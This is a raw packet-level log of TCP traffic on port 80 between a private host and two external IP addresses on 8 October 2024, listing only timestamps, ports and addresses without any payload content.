Oct 8, 2024 11:31:43.777802944 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777806044 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777816057 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777825117 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777839899 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777839899 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777839899 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777851105 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777859926 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777869940 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777878046 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777878046 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777887106 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777895927 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777905941 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777905941 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777942896 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777947903 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777947903 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777951956 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778038979 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778049946 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778086901 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778086901 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778109074 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778119087 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778129101 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778139114 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778151035 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778219938 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778229952 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778230906 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778230906 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778239965 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778254032 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778264046 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778273106 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778284073 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778307915 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778307915 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778307915 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778311014 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778322935 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778331995 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778343916 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778353930 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778366089 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778395891 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778395891 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778395891 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778461933 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778480053 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778480053 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778490067 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778501987 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778512001 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778521061 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778529882 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778538942 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778542995 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778542995 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778556108 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778567076 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778584003 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778594017 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778604031 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778614044 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778623104 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778630018 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778630018 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778630018 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778631926 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778650045 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778664112 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778672934 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778683901 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778693914 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778703928 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778703928 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778703928 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778703928 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778713942 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778724909 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778733969 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778745890 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.778779984 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778779984 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.778779984 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.819991112 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820008039 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820027113 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820036888 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820051908 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820063114 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820065975 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.820075989 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.820113897 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866274118 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866292953 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866303921 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866322994 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866328001 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866338968 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866345882 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866348982 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866385937 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866420984 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866431952 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866441965 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866468906 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866489887 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866506100 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866514921 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866525888 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866535902 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866554976 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866574049 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866674900 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866684914 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866694927 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866728067 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866734028 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866738081 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866749048 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866769075 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866796017 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866811037 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866820097 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866831064 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866843939 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866856098 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866856098 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866867065 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866894960 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866919041 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866920948 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866931915 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866940975 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866950989 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866961956 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866972923 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.866977930 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866982937 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.866982937 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867014885 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867069006 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867082119 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867091894 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867101908 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867113113 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867113113 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867121935 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867132902 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867140055 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867157936 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867182016 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867204905 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867216110 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867224932 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867239952 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867250919 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867260933 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867273092 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867273092 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867284060 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867295027 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867306948 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867307901 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867326021 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867360115 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867376089 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867403984 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867413044 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867423058 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867433071 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867443085 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867444038 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867454052 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867461920 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867465019 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867475033 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867486000 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867496014 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867496967 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867505074 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867515087 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867520094 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867528915 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867538929 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867542028 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867556095 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867559910 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867566109 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867578030 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867587090 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867588043 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867599010 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867605925 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867609978 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867616892 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867619991 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867630005 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867638111 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867641926 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867647886 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867657900 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867667913 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867671967 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867677927 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867687941 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867688894 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867697954 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867707968 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867708921 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867716074 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867717981 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867728949 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867738962 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867748022 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867748976 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867759943 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867765903 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867774010 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867777109 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867788076 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867790937 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867798090 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867808104 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867809057 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867818117 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867827892 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867829084 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867840052 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867850065 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867855072 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867865086 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867868900 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867876053 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867880106 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867886066 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867896080 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867906094 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867907047 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867916107 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867927074 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867930889 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867937088 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867948055 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.867948055 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.867978096 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.868005991 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.908781052 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.908793926 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.908804893 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.908813953 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.908824921 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.908828020 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.908876896 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:45.526494980 CEST	50000	80	192.168.2.6	91.195.240.19
Oct 8, 2024 11:31:45.531302929 CEST	80	50000	91.195.240.19	192.168.2.6
Oct 8, 2024 11:31:45.531456947 CEST	50000	80	192.168.2.6	91.195.240.19
Oct 8, 2024 11:31:45.531542063 CEST	50000	80	192.168.2.6	91.195.240.19
Oct 8, 2024 11:31:45.537601948 CEST	80	50000	91.195.240.19	192.168.2.6
Oct 8, 2024 11:31:46.044589043 CEST	50000	80	192.168.2.6	91.195.240.19
Oct 8, 2024 11:31:46.050605059 CEST	80	50000	91.195.240.19	192.168.2.6
Oct 8, 2024 11:31:46.050662041 CEST	50000	80	192.168.2.6	91.195.240.19
Oct 8, 2024 11:31:47.423794031 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:50.684621096 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:50.689512014 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:50.689632893 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:50.689831018 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:50.694806099 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295573950 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295593977 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295608997 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295618057 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295624971 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295635939 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295650005 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295660973 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295672894 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295684099 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.295682907 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.295720100 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.295775890 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.300642967 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.300704002 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.300796986 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.381625891 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.381648064 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.381661892 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.381675005 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.381689072 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.381758928 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.382035971 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.382057905 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.382070065 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.382081032 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.382095098 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.382127047 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.382127047 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.382210970 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.382988930 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383008003 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383021116 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383033037 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383045912 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383146048 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.383188009 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.383905888 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383919954 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383932114 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.383987904 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.384001970 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.384082079 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.384083033 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.384083033 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.384777069 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.384870052 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.385217905 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.386609077 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.386714935 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.386809111 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708203077 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708290100 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708302021 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708314896 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708326101 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708339930 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708343983 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708360910 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.708372116 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.708374023 CEST	80	50001	63.250.38.167	192.168.2.6
